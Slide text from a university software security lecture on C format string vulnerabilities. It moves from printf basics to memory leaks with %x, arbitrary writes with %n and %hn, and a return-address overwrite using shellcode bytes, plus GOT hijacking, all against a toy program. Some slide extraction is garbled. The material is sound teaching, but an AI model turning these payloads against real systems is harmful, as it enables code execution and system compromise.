Lec 11: Format String

CS492E: Introduction to Software Security

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Format String Exploit

• Another classic control hijack *attack vector*
  − Another type of memory corruption in C

• First noted in around 1989 by Barton Miller
Format String is ...

An argument right before “...” (variable-length arguments) that is used to convert C data types into a string. (e.g., printf, sprintf, sscanf, syslog, ...)

```c
int printf(const char *format, ...);
```
Example

```c
int x = 0, y = 42;
printf("%d, %d\n", x, y);
```
C is Too Generous

```c
int x = 0, y = 42;
printf("%d, %d, %d\n", x, y);
```

$ ./test
0, 42, 134513810

What is this number?
(= 0x8048492)
The Security Problem

printf(fmt, x, y);

If this is given as a user input ...
Format String Vulnerability Example

// ...
recv(sock, buf, sizeof(buf), 0);
printf(buf); // print the message

- buf = "hello" // No problem
- buf = "%x.%x.%x\n" // Leak memory
So Far ...

- Format string vulnerability allows us to read arbitrary memory contents on the stack

- What about *arbitrary memory write*?
## Formats

<table>
<thead>
<tr>
<th>Format</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>%d</td>
<td>Decimal output</td>
</tr>
<tr>
<td>%x</td>
<td>Hexadecimal output</td>
</tr>
<tr>
<td>%u</td>
<td>Unsigned decimal output</td>
</tr>
<tr>
<td>%s</td>
<td>String output</td>
</tr>
<tr>
<td>%n</td>
<td># of bytes written so far</td>
</tr>
</tbody>
</table>

Nothing printed for %n
%n Example

```c
int x;
int y;

x = 10;

printf("%08d\n%n", x, &y); // outputs 00000010
printf("%d\n", y); // outputs 9
```
Example Revisited

```c
// ...
recv(sock, buf, sizeof(buf), 0);
printf(buf); // print the message
```

```c
buf = "\%n"
```

Write 0 to the address 0x42
Example Revisited

// …
recv(sock, buf, sizeof(buf), 0);
printf(buf); // print the message

buf = "AAAA%x.%n"

Write 7 to the address 0x41414141
Format String Vulnerability

Allows an attacker to write arbitrary data to arbitrary addresses

Q: If you can choose an address to overwrite (32-bit), which address will it be?
Many Choices

- Return address of a function (as in stack-based exploits)
- GOT (Global Offset Table)
- Destructor section (.dtor)
- Function pointers

The key idea is to overwrite something that can affect the control flow of the target program
Running Example (fmt.c)

```c
int main(int argc, char* argv[]) {
    char buf[512];
    fgets(buf, sizeof(buf), stdin);
    printf(buf);
    return 0;
}
```
Suppose we ran this program with

```
$ echo "AAAA%x.%x" | ./fmt
```

```
0xbffff708
```

```
Old EBP
```

```
Return addr. (libc)
```

```
argv
```

```
argc
```

```
buf
```

```
0xbffff508
```

```
0xbffff508
```

What is going to be the output?
Suppose we ran this program with $ echo “AAAA%x.%x” | ./fmt

AAAA41414141.252e7825

Q: Can you explain why it prints the characters in this order?
$ echo “AAAA%n” | ./fmt

Write 4 to 0x41414141

$ echo “AAAAABBBBBBB%n” | ./fmt

Write 10 to 0x41414141

Q: How can we write a big number?
First Attempt: Use Width Field

• %<width>d
  - The output will always have minimum ‘width’ characters
  - E.g., printf(“%10d”, 42) will result in “        42”
$ echo "AAAAABBBBBAAA%134480118d%n" | ./.fmt

Write 0x8040102 to 0x42424242

Too many characters to print out
Second Attempt: Use Short Writes

• %hn
  – When we use ‘h’ in front of a format specifier, the corresponding argument is interpreted as a short int (2 bytes)
  – Thus, we can write 2 bytes at a time

• Writing 0x08040102 becomes
  – writing 0x0102 and then writing 0x0804
$ echo "AAAAABBBAAAAADBBB%242d%hn%1794d%hn" | ./fmt

Write 0x8040102 to 0x4242424242

258 + 1794 = 2052 = 0x0804
16 + 242 = 258 = 0x0102

Q: What if the first number to write is bigger than the second one?
Third Attempt: Considering Overflow

• Suppose we want to write 0x08042222 to 0x424242

• 0x2222 = 8738
• 0x0804 = 2052

16 + 8722 = 8738 = 0x2222
8738 + 58850 = 67588 = 0x10804

$ echo “AAAABBBBAAAAADBBE%d%hn%58850d%hn” | ./fmt
Q: What If the Target Buffer is Far Away?

We need to pop off the stack until we reach the buffer: e.g., %d%d%d%d...%d%d%d%n

4 bytes per one %d

0xbffff508
Further Optimization with Dollar Sign ($)

• Enables direct access to the \( n \)th parameter.
• Syntax: \%\(<n>\)$\(<\text{format specifier}>\)

• Example:

```c
printf(“%d, %d, %d, %2$d\n”, 1, 2, 3);
// prints 1, 2, 3, 2
```
Final Attempt: Minimizing Payload w/ $ \\
\$ \text{echo} \ "\text{AAAABBBAAAAADBBDDBBB}8722d%hn%58850d%hn" \ | \ .\text{fmt} \\
\$ \text{echo} \ "\text{BBBBDBBB}8730d1%hn%58850d2%hn" \ | \ .\text{fmt}
Control Flow Hijack Exploit

Overwriting the return address of \texttt{main()}

For simplicity, we assume we know exact memory layout of the program.
$ echo "\x0c\xf7\xff\xbf\x0e\xf7\xff\xbf\xba\x00...\xcd\x80%62697d%1$hn%51951d%2$hn" | ./fmt

Target address (0xbffff70c)
Target address (0xbffff70e)
Shellcode (31 bytes)
Jump to buf+8

Shellcode

This doesn’t work! Why?
$ echo "\x0c\xf7\xff\xbf\x0e\xf7\xff\xbf\xba\x00.\xcd\x80%62697d%1$hn%51951d%2$hn"
| ./fmt

Target address (0xbfffff70c)
Target address (0xbfffff70e)
Shellcode (31 bytes)
Jump to buf+8

Cannot have NULL characters!

$ echo "\x0c\xf7\xff\xbf\x0e\xf7\xff\xbf\x31\xc0...\xcd\x86%62705d%1$hn%51951d%2$hn"
| ./fmt

Target address (0xbfffff70c)
Target address (0xbfffff70e)
Shellcode (23 bytes w/o NULL)
Jump to buf+8
Things to Consider for Successful Exploit

• gets() does not allow new line characters (\n)
  – Our payload should not contain any ‘\0a’ character
  – What if the target address (for overwriting) contains ‘\0a’?

• Environment variable makes it difficult to predict the exact address
  – Having NOP sled can help
  – Overwriting GOT or .dtor can be more robust
GOT (Global Offset Table) Hijacking

- GOT is a table that stores offsets to dynamically linked functions
- By overwriting this table, we can hijack function calls!
Dynamic Linking

... gets(line);
...

... call 80482f0 <gets@plt>
...

GOT (Global Offset Table)

... <gets>: addr of linker
...

PLT (Procedure Linkage Table)

80482e0
80482f0
8048300
...

... jmp GOT[offset of gets]
Dynamic Linking

```
... gets(line);
...
```

```
... call 80482f0 <gets@plt>
...
```

**Linker**

**GOT (Global Offset Table)**

```
... <gets>: addr of gets
...
```

**PLT (Procedure Linkage Table)**

```
80482e0
80482f0
8048300
```

```
... jmp GOT[offset of gets]
...
```
GOT is Just a Sequence of Function Pointers

Format String Exploit

GOT (Global Offset Table)

... gets(line);
...

<gets>: addr to shellcode
...

PLT (Procedure Linkage Table)

... call 80482f0 <gets@plt>
...

... jmp GOT[offset of gets]
...

...
Recap: Format String Exploit

• We learned two types of memory corruption bugs that lead to a control flow hijack exploit
  – Buffer overflow
  – Format string bug

• Unlike buffer overflow exploits, format string bugs allow an attacker to overwrite arbitrary memory addresses (the target address does not need to be on the stack)
Mitigating Format String Exploit?

Since Visual Studio 2005, \%n is disabled by default
- printf("\%n", &x); will not write anything to x

What’s the problem?
Questions?